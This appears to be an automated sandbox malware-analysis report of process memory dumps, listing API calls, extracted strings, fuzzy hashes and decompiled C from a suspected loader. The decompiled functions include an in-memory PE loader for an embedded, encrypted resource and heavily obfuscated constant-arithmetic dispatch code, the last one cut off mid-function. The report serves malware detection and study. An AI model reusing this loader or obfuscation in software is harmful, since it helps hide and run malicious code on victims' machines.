; } //// function updateFrameRateGraph(info) { info.value.innerText = getCurrentFrameRateString(); //raw data is [ [prevFrameStartPerfCount, currentFrameStartPerfCount]+ ] _updateData(info, external, xrefs: 00232C7D, 00233F57, 00234414, 0023441A, 00234516, 0023451C
D>, xrefs: 002339E1
71##, xrefs: 0023404B
}%, xrefs: 002339D9
k, xrefs: 00233246
nlvJ, xrefs: 002335B4
71##, xrefs: 002342F9
o4-(, xrefs: 00233FDD
;R,], xrefs: 002335E5
~, xrefs: 00233633
7Y, xrefs: 0023340D
DP, xrefs: 00233CD8
D'k., xrefs: 002342E7
C!), xrefs: 002338BE
I], xrefs: 0023378B
71##, xrefs: 00234459
n\, xrefs: 00233C8E
+!, xrefs: 00233B63
QG)}, xrefs: 0023316F
jd, xrefs: 00233184
d3, xrefs: 0023347C
\$, xrefs: 00233ED8
c, xrefs: 00233CBA
u, xrefs: 00233D3D

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: );$+!$,Bb*$0vkX$71##$71##$71##$71##$7Y$; } //// function updateFrameRateGraph(info) { info.value.innerText = getCurrentFrameRateString(); //raw data is [ [prevFrameStartPerfCount, currentFrameStartPerfCount]+ ] _updateData(info, external$;R,]$=<$C!)$D'k.$D'k.$D>$DP$FM$G"$I]$P&$QG)}$T5W$[ $\$$bY$c$d3$jd$kU$nY$n\$nlvJ$ny$o4-($o4-($o$yI$}%$~$=$q$u$k
API String ID: 0-523307782
Opcode ID: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
Instruction ID: daba2ee547ca6feaad999e9b2e4adc7da7e2402ee05818fcb828c7da64c631ab
Opcode Fuzzy Hash: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
Instruction Fuzzy Hash: 08D213B15193818BD378DF25C58ABDFBBE1BBC4304F10891DE19A862A0DBB49959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 100011C0, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 177encryptionmemorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000009,00003000,00000004), ref: 1000120D
GetModuleHandleExA.KERNEL32(00000000,00000000,00000000), ref: 1000122B
VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004,00000000,00000000,00000000), ref: 1000123F
GetProcAddress.KERNEL32(00000000,00000000), ref: 1000126E
VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004), ref: 10001280
GetProcAddress.KERNEL32(00000000,00000000), ref: 100012A9

Part of subcall function 10001A10: SetLastError.KERNEL32(0000007F), ref: 10001A29

LdrFindResource_U.NTDLL(10000000,00000007,00000000), ref: 100012CB
LdrAccessResource.NTDLL(10000000,?,00000000,00000000), ref: 100012E5
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 100012FD
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 1000130D
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 10001320
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 1000133A
CryptHashData.ADVAPI32(?,jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx,0000002A,00000001), ref: 10001354
CryptDeriveKey.ADVAPI32(?,00006801,?,00000001,?), ref: 1000136F
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000000), ref: 10001391
_memmove.LIBCMT ref: 1000139C
CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 100013B5

Strings

Control_RunDLL, xrefs: 100013CB
jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx, xrefs: 1000134C
LdrAccessResource, xrefs: 10001282
LdrFindResource_U, xrefs: 10001241
ntdll.dll, xrefs: 1000120F

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$AllocVirtual$AcquireContext$AddressHashProc$AccessCreateDataDeriveEncryptErrorFindHandleLastModuleResourceResource__memmove
String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx$ntdll.dll
API String ID: 2007481169-3150289311
Opcode ID: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
Instruction ID: a3675f4d503a69c22f59064f11fbc194b2fe3a8f938d4bec1e3a9f9fa3db5d27
Opcode Fuzzy Hash: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
Instruction Fuzzy Hash: 71515071940219BAFB11EBA1CC45FEEBBB8EF19780F014156F604B61E4EBB1A545CB70

Uniqueness

Uniqueness Score: -1.00%

Function 10001B30, Relevance: 18.3, APIs: 12, Instructions: 256
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10001B30(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v44;
				char _v48;
				signed int _t67;
				void* _t72;
				long _t74;
				void* _t86;
				void* _t89;
				void* _t90;
				void* _t95;
				intOrPtr _t98;
				intOrPtr* _t100;
				void* _t109;
				intOrPtr _t111;
				void* _t112;
				intOrPtr _t113;
				void* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr* _t128;
				intOrPtr* _t129;
				signed int _t131;
				intOrPtr _t133;
				signed int _t135;
				long _t138;
				long _t139;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				_t113 = _a8;
				_t147 = 0;
				_v8 = __ecx;
				if(_t113 >= 0x40) {
					_t129 = _a4;
					if( *_t129 == 0x5a4d) {
						_t117 =  *((intOrPtr*)(_t129 + 0x3c));
						if(_t113 < _t117 + 0xf8) {
							goto L1;
						} else {
							_t114 = _t117 + _t129;
							if( *((intOrPtr*)(_t117 + _t129)) != 0x4550 ||  *((intOrPtr*)(_t114 + 4)) != 0x14c || ( *(_t114 + 0x38) & 0x00000001) != 0) {
								goto L3;
							} else {
								_t12 = _t114 + 0x14; // 0xc033cd33
								_t67 =  *_t12 & 0x0000ffff;
								_t13 = _t114 + 6; // 0xe8ef4d8d
								_t135 =  *_t13 & 0x0000ffff;
								if(_t135 != 0) {
									_t14 = _t114 + 0x24; // 0x100013ef
									_t128 = _t14 + _t67;
									do {
										_t15 = _t128 + 4; // 0x12f7805
										_t133 =  *_t15;
										_t111 =  *_t128;
										if(_t133 != 0) {
											_t112 = _t111 + _t133;
										} else {
											_t16 = _t114 + 0x38; // 0xff1075ff
											_t112 = _t111 +  *_t16;
										}
										_t147 =  >  ? _t112 : _t147;
										_t128 = _t128 + 0x28;
										_t135 = _t135 - 1;
									} while (_t135 != 0);
								}
								_push( &_v48); // executed
								L100037FA(); // executed
								_t118 = _v44;
								_t19 = _t118 - 1; // -1
								_t20 = _t114 + 0x50; // 0xcc25d
								_t21 = _t118 - 1; // -1
								_t22 = _t118 - 1; // -1
								_t131 =  !_t21;
								_t138 = _t19 +  *_t20 & _t131;
								if(_t138 == (_t22 + _t147 & _t131)) {
									_t23 = _t114 + 0x34; // 0xec8b55cc, executed
									_t72 = VirtualAlloc( *_t23, _t138, 0x3000, 4); // executed
									_t148 = _t72;
									_v12 = _t148;
									if(_t148 != 0) {
										L18:
										_t74 = HeapAlloc(GetProcessHeap(), 8, 0x34);
										_t139 = _t74;
										if(_t139 != 0) {
											 *(_t139 + 4) = _t148;
											_t27 = _t114 + 0x16; // 0xe85ec033
											 *(_t139 + 0x14) = ( *_t27 & 0x0000ffff) >> 0x0000000d & 0x00000001;
											 *((intOrPtr*)(_t139 + 0x1c)) = _a12;
											 *((intOrPtr*)(_t139 + 0x20)) = _a16;
											 *((intOrPtr*)(_t139 + 0x24)) = _a20;
											 *((intOrPtr*)(_t139 + 0x28)) = _a24;
											 *((intOrPtr*)(_t139 + 0x30)) = _v44;
											_t40 = _t114 + 0x54; // 0xec8b55cc
											if(E100015F0(_a8,  *_t40) == 0) {
												L36:
												_t115 = _v8;
												goto L37;
											} else {
												_t42 = _t114 + 0x54; // 0xec8b55cc
												_t86 = VirtualAlloc(_t148,  *_t42, 0x1000, 4);
												_t43 = _t114 + 0x54; // 0xec8b55cc
												_t149 = _t86;
												E10001F40(_t149, _a4,  *_t43);
												_t89 =  *((intOrPtr*)(_a4 + 0x3c)) + _t149;
												_t150 = _v12;
												 *_t139 = _t89;
												 *((intOrPtr*)(_t89 + 0x34)) = _t150;
												_t90 = E10001620(_a4, _a8, _t114, _t139); // executed
												if(_t90 == 0) {
													goto L36;
												} else {
													_t52 = _t114 + 0x34; // 0xec8b55cc
													_t93 =  *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52;
													_t115 = _v8;
													if( *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52) {
														 *((intOrPtr*)(_t139 + 0x18)) = 1;
													} else {
														 *((intOrPtr*)(_t139 + 0x18)) = E10001E90(_t139, _t93);
													}
													if(E10001470(_t115, _t139) == 0) {
														L37:
														E10001980(_t139);
														return 0;
													} else {
														_t95 = E10001830(_t115, _t139); // executed
														if(_t95 == 0 || E10001730(_t139) == 0) {
															goto L37;
														} else {
															_t98 =  *((intOrPtr*)( *_t139 + 0x28));
															if(_t98 == 0) {
																 *((intOrPtr*)(_t139 + 0x2c)) = 0;
																return _t139;
															} else {
																_t100 = _t98 + _t150;
																if( *(_t139 + 0x14) == 0) {
																	 *((intOrPtr*)(_t139 + 0x2c)) = _t100;
																	return _t139;
																} else {
																	_push(0);
																	_push(1);
																	_push(0x10000000);
																	if( *_t100() != 0) {
																		 *((intOrPtr*)(_t139 + 0x10)) = 1;
																		return _t139;
																	} else {
																		SetLastError(0x45a);
																		E10001980(_t139);
																		return 0;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											VirtualFree(_t148, _t74, 0x8000);
											goto L20;
										}
									} else {
										_t109 = VirtualAlloc(_t72, _t138, 0x3000, 4); // executed
										_t148 = _t109;
										_v12 = _t109;
										if(_t148 == 0) {
											L20:
											SetLastError(0xe);
											return 0;
										} else {
											goto L18;
										}
									}
								} else {
									SetLastError(0xc1);
									return 0;
								}
							}
						}
					} else {
						L3:
						SetLastError(0xc1);
						return 0;
					}
				} else {
					L1:
					SetLastError(0xd);
					return 0;
				}
			}

0x10001b37
0x10001b3b
0x10001b3d
0x10001b43
0x10001b57
0x10001b62
0x10001b79
0x10001b84
0x00000000
0x10001b86
0x10001b8d
0x10001b90
0x00000000
0x10001ba3
0x10001ba3
0x10001ba3
0x10001ba8
0x10001ba8
0x10001bae
0x10001bb0
0x10001bb3
0x10001bb5
0x10001bb5
0x10001bb5
0x10001bb8
0x10001bbc
0x10001bc3
0x10001bbe
0x10001bbe
0x10001bbe
0x10001bbe
0x10001bc7
0x10001bca
0x10001bcd
0x10001bcd
0x10001bb5
0x10001bd3
0x10001bd4
0x10001bd9
0x10001bdc
0x10001bdf
0x10001be2
0x10001be5
0x10001be8
0x10001bec
0x10001bf2
0x10001c12
0x10001c15
0x10001c1b
0x10001c1d
0x10001c22
0x10001c3c
0x10001c47
0x10001c4d
0x10001c51
0x10001c73
0x10001c76
0x10001c83
0x10001c89
0x10001c8f
0x10001c95
0x10001c9b
0x10001ca1
0x10001ca4
0x10001cb1
0x10001db9
0x10001db9
0x00000000
0x10001cb7
0x10001cbe
0x10001cc2
0x10001cc8
0x10001ccb
0x10001cd1
0x10001ce2
0x10001ce4
0x10001cec
0x10001cef
0x10001cf2
0x10001cf9
0x00000000
0x10001cff
0x10001d04
0x10001d04
0x10001d07
0x10001d0a
0x10001d1a
0x10001d0c
0x10001d15
0x10001d15
0x10001d2b
0x10001dbc
0x10001dbf
0x10001dcc
0x10001d31
0x10001d34
0x10001d3b
0x00000000
0x10001d49
0x10001d4b
0x10001d50
0x10001da7
0x10001db6
0x10001d52
0x10001d52
0x10001d58
0x10001d99
0x10001da4
0x10001d5a
0x10001d5a
0x10001d5c
0x10001d5e
0x10001d67
0x10001d87
0x10001d96
0x10001d69
0x10001d6e
0x10001d77
0x10001d84
0x10001d84
0x10001d67
0x10001d58
0x10001d50
0x10001d3b
0x10001d2b
0x10001cf9
0x10001c53
0x10001c5a
0x00000000
0x10001c5a
0x10001c24
0x10001c2d
0x10001c33
0x10001c35
0x10001c3a
0x10001c60
0x10001c62
0x10001c70
0x00000000
0x00000000
0x00000000
0x10001c3a
0x10001bf4
0x10001bf9
0x10001c07
0x10001c07
0x10001bf2
0x10001b90
0x10001b64
0x10001b64
0x10001b69
0x10001b76
0x10001b76
0x10001b45
0x10001b45
0x10001b47
0x10001b54
0x10001b54

APIs

SetLastError.KERNEL32(0000000D,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B47
SetLastError.KERNEL32(000000C1,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B69

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
Instruction ID: dde5234afa376a0e77413f1c03799da7f4dedddb12eec0223d0ea39616f97933
Opcode Fuzzy Hash: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
Instruction Fuzzy Hash: EC81D036700215ABEB00DF69DC80BE9B7E8FB88391F10416AFD04DB246E731E955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00244B41, Relevance: 15.2, Strings: 12, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00244B41() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _t200;
				signed int _t202;
				signed int _t206;
				void* _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;
				signed int _t216;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t245;
				signed int* _t247;
				void* _t249;

				_t247 =  &_v592;
				_v592 = 0xe399;
				_v592 = _v592 << 2;
				_t214 = 0xf501058;
				_v592 = _v592 << 0xe;
				_v592 = _v592 ^ 0xe399001c;
				_v588 = 0x8f0f;
				_v588 = _v588 * 0x29;
				_t245 = 0;
				_v588 = _v588 ^ 0x0016e94e;
				_v568 = 0x725;
				_t239 = 0x36;
				_v568 = _v568 / _t239;
				_t240 = 0xc;
				_v568 = _v568 * 0x63;
				_v568 = _v568 << 8;
				_v568 = _v568 ^ 0x000ca091;
				_v532 = 0x951;
				_v532 = _v532 << 7;
				_v532 = _v532 ^ 0x0004989a;
				_v524 = 0x2ad;
				_v524 = _v524 | 0xf8213247;
				_v524 = _v524 ^ 0xf82150c2;
				_v548 = 0x8830;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 >> 0xf;
				_v548 = _v548 ^ 0x00006238;
				_v588 = 0xba20;
				_v588 = _v588 | 0x721cc32f;
				_v588 = _v588 ^ 0x721c8c06;
				_v580 = 0x8092;
				_v580 = _v580 + 0xfffffe56;
				_v580 = _v580 / _t240;
				_v580 = _v580 >> 3;
				_v580 = _v580 ^ 0x000005b6;
				_v540 = 0xe99f;
				_v540 = _v540 + 0xfffff8d3;
				_v540 = _v540 | 0x984d7063;
				_v540 = _v540 ^ 0x984d8ec7;
				_v556 = 0xc4eb;
				_t241 = 0x4e;
				_v556 = _v556 * 0x5c;
				_v556 = _v556 + 0x75ac;
				_v556 = _v556 ^ 0x00477921;
				_v536 = 0x9b3b;
				_v536 = _v536 + 0xaa1d;
				_v536 = _v536 ^ 0x00012776;
				_v572 = 0x8e84;
				_v572 = _v572 * 0x29;
				_v572 = _v572 / _t241;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x000020e9;
				_v528 = 0xcb2d;
				_t242 = 0x21;
				_v528 = _v528 / _t242;
				_v528 = _v528 ^ 0x00001b4e;
				_v544 = 0x6df7;
				_v544 = _v544 ^ 0x414c8853;
				_t243 = 0x49;
				_v544 = _v544 * 0x75;
				_v544 = _v544 ^ 0xd824a1d7;
				_v552 = 0xc4f0;
				_v552 = _v552 ^ 0x9d070a5f;
				_v552 = _v552 + 0xffff498d;
				_v552 = _v552 ^ 0x9d0763b6;
				_v564 = 0xe384;
				_v564 = _v564 ^ 0xde12aa62;
				_v564 = _v564 | 0x2c019ae9;
				_v564 = _v564 ^ 0xa4e5f9a5;
				_v564 = _v564 ^ 0x5af67a61;
				_v576 = 0x7d9f;
				_v576 = _v576 + 0x6134;
				_v576 = _v576 | 0x6ccc595a;
				_v576 = _v576 ^ 0x0058e7ee;
				_v576 = _v576 ^ 0x6c9448a2;
				_v592 = 0x396f;
				_v592 = _v592 * 7;
				_v592 = _v592 ^ 0x10cc7cbf;
				_v592 = _v592 ^ 0x10cdfb96;
				_v560 = 0x3078;
				_v560 = _v560 << 8;
				_t244 = _v588;
				_v560 = _v560 / _t243;
				_v560 = _v560 + 0xffff6a19;
				_v560 = _v560 ^ 0x000f142e;
				goto L1;
				do {
					while(1) {
						L1:
						_t249 = _t214 - 0x3227b83a;
						if(_t249 > 0) {
							break;
						}
						if(_t249 == 0) {
							_v584 = 0xc457;
							_v584 = _v584 >> 6;
							_t165 =  &_v584;
							 *_t165 = _v584 ^ 0x0000030d;
							__eflags =  *_t165;
							_t202 =  *0x24ca2c; // 0x5d8300
							 *((intOrPtr*)(_t202 + 0x218)) = E00247CC2;
							L13:
							_t214 = 0x2ded9275;
							continue;
						}
						if(_t214 == 0xf501058) {
							_push(_t214);
							_push(_t214);
							_t206 = E00238736(0x454);
							 *0x24ca2c = _t206;
							__eflags = _t206;
							if(_t206 == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t206 + 0x214)) = E002420C5;
							_t214 = 0x382146c2;
							continue;
						}
						if(_t214 == 0x204dd1d9) {
							E0023B112();
							_t214 = 0x354eaa90;
							continue;
						}
						if(_t214 == 0x24baa30b) {
							_v584 = 0xe62c;
							_t214 = 0x36e33d60;
							_v584 = _v584 ^ 0x84d80cbd;
							_v584 = _v584 ^ 0x84d8eab8;
							continue;
						}
						if(_t214 != 0x2ded9275) {
							goto L22;
						}
						_push(_t214);
						_push(_t214);
						E0023C6C7(_v536, _v572,  *0x24ca2c, _t214, _v528, _v584, _v544); // executed
						_t247 =  &(_t247[7]);
						_t214 = 0x204dd1d9;
						_t210 = 1;
						_t245 =  ==  ? _t210 : _t245;
					}
					__eflags = _t214 - 0x354eaa90;
					if(__eflags == 0) {
						E00243E3F(_t214,  &_v520, __eflags, _v552, _v564);
						_t200 = E0023E29C(_v576, _v592,  &_v520);
						_t216 =  *0x24ca2c; // 0x5d8300
						_t247 =  &(_t247[3]);
						 *((intOrPtr*)(_t216 + 0x438)) = _t200;
						_t214 = 0xae4e76a;
						goto L22;
					}
					__eflags = _t214 - 0x36e33d60;
					if(_t214 == 0x36e33d60) {
						E00235FB2(_v540, _v556, _t244);
						goto L13;
					}
					__eflags = _t214 - 0x382146c2;
					if(_t214 != 0x382146c2) {
						goto L22;
					}
					_t211 = E00232959(_t214, _v548, _v588, _v580, _v560); // executed
					_t244 = _t211;
					_t247 =  &(_t247[4]);
					__eflags = _t244;
					if(_t244 == 0) {
						_t214 = 0x3227b83a;
					} else {
						_t212 =  *0x24ca2c; // 0x5d8300
						 *((intOrPtr*)(_t212 + 0x224)) = 1;
						_t214 = 0x24baa30b;
					}
					goto L1;
					L22:
					__eflags = _t214 - 0xae4e76a;
				} while (_t214 != 0xae4e76a);
				L23:
				return _t245;
			}

0x00244b41
0x00244b47
0x00244b50
0x00244b54
0x00244b59
0x00244b5d
0x00244b64
0x00244b75
0x00244b79
0x00244b7b
0x00244b83
0x00244b91
0x00244b96
0x00244ba1
0x00244ba4
0x00244ba8
0x00244bad
0x00244bb5
0x00244bbd
0x00244bc2
0x00244bca
0x00244bd2
0x00244bda
0x00244be2
0x00244bea
0x00244bef
0x00244bf4
0x00244bfc
0x00244c04
0x00244c0c
0x00244c14
0x00244c1c
0x00244c2c
0x00244c30
0x00244c35
0x00244c3d
0x00244c45
0x00244c4d
0x00244c55
0x00244c5d
0x00244c6a
0x00244c6d
0x00244c71
0x00244c79
0x00244c81
0x00244c89
0x00244c91
0x00244c99
0x00244ca6
0x00244cb2
0x00244cb6
0x00244cbb
0x00244cc3
0x00244ccf
0x00244cd2
0x00244cd6
0x00244cde
0x00244ce6
0x00244cf7
0x00244d02
0x00244d06
0x00244d0e
0x00244d16
0x00244d1e
0x00244d26
0x00244d2e
0x00244d36
0x00244d3e
0x00244d46
0x00244d4e
0x00244d56
0x00244d5e
0x00244d66
0x00244d6e
0x00244d76
0x00244d7e
0x00244d8b
0x00244d8f
0x00244d97
0x00244d9f
0x00244da7
0x00244db2
0x00244db6
0x00244dba
0x00244dc2
0x00244dc2
0x00244dca
0x00244dca
0x00244dca
0x00244dca
0x00244dcc
0x00000000
0x00000000
0x00244dd2
0x00244e98
0x00244ea0
0x00244ea5
0x00244ea5
0x00244ea5
0x00244ead
0x00244eb2
0x00244ebc
0x00244ebc
0x00000000
0x00244ebc
0x00244dde
0x00244e69
0x00244e6a
0x00244e70
0x00244e75
0x00244e7c
0x00244e7e
0x00000000
0x00000000
0x00244e84
0x00244e8e
0x00000000
0x00244e8e
0x00244de6
0x00244e4e
0x00244e53
0x00000000
0x00244e53
0x00244dee
0x00244e2c
0x00244e34
0x00244e39
0x00244e41
0x00000000
0x00244e41
0x00244df2
0x00000000
0x00000000
0x00244df8
0x00244df9
0x00244e15
0x00244e1a
0x00244e1d
0x00244e26
0x00244e27
0x00244e27
0x00244ec3
0x00244ec9
0x00244f39
0x00244f4b
0x00244f50
0x00244f56
0x00244f59
0x00244f5f
0x00000000
0x00244f5f
0x00244ecb
0x00244ed1
0x00244f25
0x00000000
0x00244f2a
0x00244ed3
0x00244ed9
0x00000000
0x00000000
0x00244eef
0x00244ef4
0x00244ef6
0x00244ef9
0x00244efb
0x00244f15
0x00244efd
0x00244efd
0x00244f05
0x00244f0b
0x00244f0b
0x00000000
0x00244f64
0x00244f64
0x00244f64
0x00244f71
0x00244f7c

Strings

j, xrefs: 00244F64
!yG, xrefs: 00244C79
, xrefs: 00244CBB
o9, xrefs: 00244D7E
X, xrefs: 00244D6E
x0, xrefs: 00244D9F
Q, xrefs: 00244BB5
j, xrefs: 00244F5F
8b, xrefs: 00244BF4
`=6, xrefs: 00244ECB
`=6, xrefs: 00244E34
,, xrefs: 00244E2C

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: !yG$,$8b$Q$`=6$`=6$j$j$o9$x0$ $X
API String ID: 0-3958274775
Opcode ID: 151cea3ad7c89dd702ee93776cf97ea4601d4e6957da9cf5090533907b0e08b0
Instruction ID: 5f43662d51b6feda9cbbe9d5ae60ba3e4508172afbd750758477588350ad9d1d
Opcode Fuzzy Hash: 151cea3ad7c89dd702ee93776cf97ea4601d4e6957da9cf5090533907b0e08b0
Instruction Fuzzy Hash: 73A175716183819FD358DF64C48A52BFBE1FBC4358F204A1DF1969A2A0C7B8CA59CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00243895, Relevance: 14.0, Strings: 11, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00243895() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t281;
				intOrPtr _t284;
				void* _t286;
				void* _t290;
				void* _t294;
				void* _t295;
				char _t297;
				void* _t303;
				intOrPtr _t321;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int* _t331;

				_t331 =  &_v700;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t295 = 0x16120aa4;
				_v536 = 0x65127b;
				_v664 = 0x3b49;
				_v664 = _v664 << 5;
				_v664 = _v664 + 0x6a36;
				_v664 = _v664 >> 7;
				_v664 = _v664 ^ 0x00000fa7;
				_v616 = 0x772f;
				_v616 = _v616 ^ 0x73b15b69;
				_v616 = _v616 ^ 0x73b12d46;
				_v604 = 0xe6c8;
				_v604 = _v604 + 0x8155;
				_v604 = _v604 ^ 0x000105e4;
				_v700 = 0xa5d;
				_v700 = _v700 * 0x52;
				_t294 = 0;
				_v700 = _v700 + 0xffffecf8;
				_t325 = 0x58;
				_v700 = _v700 * 0x66;
				_v700 = _v700 ^ 0x014b32de;
				_v684 = 0xc8e0;
				_v684 = _v684 + 0x308b;
				_v684 = _v684 + 0x2664;
				_v684 = _v684 >> 6;
				_v684 = _v684 ^ 0x00006abe;
				_v676 = 0x796a;
				_v676 = _v676 + 0xffff196c;
				_v676 = _v676 + 0xffffd40e;
				_v676 = _v676 ^ 0xd773f48b;
				_v676 = _v676 ^ 0x288ceae9;
				_v612 = 0x157c;
				_v612 = _v612 << 0x10;
				_v612 = _v612 ^ 0x157c11c9;
				_v652 = 0xe7a2;
				_v652 = _v652 / _t325;
				_v652 = _v652 | 0x448e2e0d;
				_v652 = _v652 ^ 0x448e7eb8;
				_v640 = 0x3ee9;
				_v640 = _v640 * 0x5d;
				_v640 = _v640 >> 0xd;
				_v640 = _v640 ^ 0x0000282d;
				_v648 = 0xf425;
				_v648 = _v648 * 9;
				_v648 = _v648 >> 1;
				_v648 = _v648 ^ 0x0004354a;
				_v608 = 0x24ee;
				_v608 = _v608 + 0x809c;
				_v608 = _v608 ^ 0x0000fdeb;
				_v636 = 0x6dae;
				_v636 = _v636 + 0x1c44;
				_v636 = _v636 + 0x2b83;
				_v636 = _v636 ^ 0x0000a12d;
				_v656 = 0xe590;
				_v656 = _v656 >> 2;
				_v656 = _v656 << 7;
				_v656 = _v656 ^ 0x001cffcc;
				_v668 = 0xb9db;
				_v668 = _v668 >> 0xd;
				_v668 = _v668 + 0x89dd;
				_v668 = _v668 | 0xbce2fd3c;
				_v668 = _v668 ^ 0xbce2f9c6;
				_v596 = 0x1790;
				_v596 = _v596 + 0xffff27ec;
				_v596 = _v596 ^ 0xffff59a3;
				_v672 = 0xffb9;
				_v672 = _v672 + 0xffff618d;
				_v672 = _v672 >> 2;
				_t326 = 0x31;
				_v672 = _v672 * 0x75;
				_v672 = _v672 ^ 0x000b38e4;
				_v644 = 0xc4de;
				_v644 = _v644 + 0xbfb6;
				_v644 = _v644 ^ 0xc1434f22;
				_v644 = _v644 ^ 0xc142a5f5;
				_v680 = 0x8a5a;
				_v680 = _v680 | 0x8f6cf4f7;
				_v680 = _v680 + 0x838e;
				_v680 = _v680 + 0xffffa8f9;
				_v680 = _v680 ^ 0x8f6d4033;
				_v660 = 0xe8e2;
				_v660 = _v660 / _t326;
				_t327 = 0x25;
				_v660 = _v660 * 0x78;
				_v660 = _v660 ^ 0x000205be;
				_v688 = 0x9cd0;
				_v688 = _v688 + 0x8e7d;
				_v688 = _v688 * 0x26;
				_v688 = _v688 * 0x51;
				_v688 = _v688 ^ 0x0e0ecd55;
				_v620 = 0xe1b5;
				_v620 = _v620 / _t327;
				_v620 = _v620 ^ 0x00005557;
				_v696 = 0x769d;
				_v696 = _v696 >> 7;
				_v696 = _v696 | 0x5538ae99;
				_v696 = _v696 << 2;
				_v696 = _v696 ^ 0x54e2b31f;
				_v600 = 0xdcef;
				_v600 = _v600 << 6;
